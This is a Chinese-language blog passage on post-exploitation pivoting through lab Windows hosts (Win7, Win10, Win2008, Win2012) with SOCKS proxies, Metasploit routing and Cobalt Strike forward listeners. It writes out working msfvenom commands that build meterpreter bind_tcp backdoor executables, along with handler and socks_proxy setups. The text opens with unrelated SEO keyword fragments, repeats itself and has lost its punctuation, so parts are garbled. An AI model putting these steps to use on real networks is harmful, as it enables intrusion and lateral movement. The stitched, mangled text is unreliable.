网站的视频做gif,wordpress 做值班表,网站运营外包方案,纯文字网站设计我这里只记录原理#xff0c;具体操作看文章后半段或者这篇文章内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客
注意这里是解决后渗透通讯问题#xff0c;之后怎么提权#xff0c;控制后面再说 背景 只有win7有网#xff0c;其…我这里只记录原理具体操作看文章后半段或者这篇文章内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客
注意这里是解决后渗透通讯问题之后怎么提权控制后面再说 背景 只有win7有网其他没网
网络情况win7有其他都没有 巧合地是:几台设备入栈规则不严格
代理协议 SOCKS4/5 代理软件 SocksCap Proxifier ProxyChains 实现两个目的 1、通讯后的渗透测试横向移动 2、通讯后的控制上线CSMSF win7当作跳板机端口转发攻击机的流量
win7上线
win7上线省略
VPS建立节点通信win10
MSF需要添加路由转发CS不需要
添加路由只是MSF可以与WIN10通信别的渗透工具不可以。所以还需要建立节点使得渗透工具可以通信 建立节点的目的是接收数据而前面的路由的目的是建立通讯
节点是在攻击者vps上建立的准确点是在MSF中建立的节点而MSF是控制win7的相当于节点部署在win7上这里可能理解不正确暂时认为节点部署在了vps上开启vps端口接收数据然后通过vps上的MSF控制器的路由去渗透内网主机
攻击者通过链接自己的vps进行操作 关键是建立节点
节点建立好之后攻击者可以使用代理工具访问该节点通过该节点访问内网主机
win10上线
到这里可以访问win10然后如果我们拿到了win10的CMD权限要控制他需要使用CSMSF。但是win10不出网而我们此时控制了win7,所以让win7去访问win10 我们需要正向链接生成本地后门执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信至此可以访问win10
bind_tcp 没有host,因为直接给的本地 反向后门
后门执行完交给控制器的2222控制器再监听自己本地的2222
CS上线win10
使用win10的CMD权限之前假设取得了此权限怎么取得的呢你信息搜集提权等操作取得的执行后门并不会上线 需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线 用192.168.11.128(win7)去控制192.168.11.129(win10) MSF上线win10
正向链接
msfvenom -p windows/meterpreter/bind_tcp LHOST0.0.0.0 LPORT3333 -f exe 2003.exe监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129 ##目标地址
set lport 3333
runsession会话 VPS建立节点通信win2008 win10建立节点链接win2008
CS建立节点 攻击者本地使用代理工具链接该地址192.168.22.131 MSF建立节点
选择会话2 建立路由 run autoroute -p run post/multi/manage/autoroute 节点要和上面的节点的端口号不要相同 use auxiliary/server/socks_proxy set srvhost 0.0.0.0 set srvport 2233 run 攻击者本地使用代理工具链接该地址192.168.22.131 win2008上线
CS上线
创建新的监听器 设置一个正向连接如果使用反向连接木马上线后由于无法和攻击机连接所以就会导致上线失败而这里使用正向连接 生成3331的后门 将生成的木马放在win2008,运行木马。此时还是不会上线和win10上线一样。
通过win10访问192.168.22.131 3331 MSF上线
生成正向链接木马 msfvenom -p windows/meterpreter/bind_tcp LHOST0.0.0.0 LPORT3333 -f exe 2008.exe 监听 use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.22.131 ##目标地址 set lport 3333 run win2012上线 CS上线
cs建立节点 然后探测资产信息提权正向链接
上线
建立监听正向链接 生成后门将后门放入win2012,执行后门 需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线 MSF上线
以下操作同上所以直接复制上面的图片下来了
MSF建立节点
选择会话3
建立路由 run autoroute -p run post/multi/manage/autoroute 节点要和上面的节点的端口号不要相同 use auxiliary/server/socks_proxy set srvhost 0.0.0.0 set srvport 3344 run 攻击者本地使用代理工具链接该地址192.168.33.130 上线
生成正向链接木马 msfvenom -p windows/meterpreter/bind_tcp LHOST0.0.0.0 LPORT4444 -f exe 2012.exe 监听 use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.33.129 ##目标地址 set lport 4444 run 入栈严格怎么办 反向链接
总结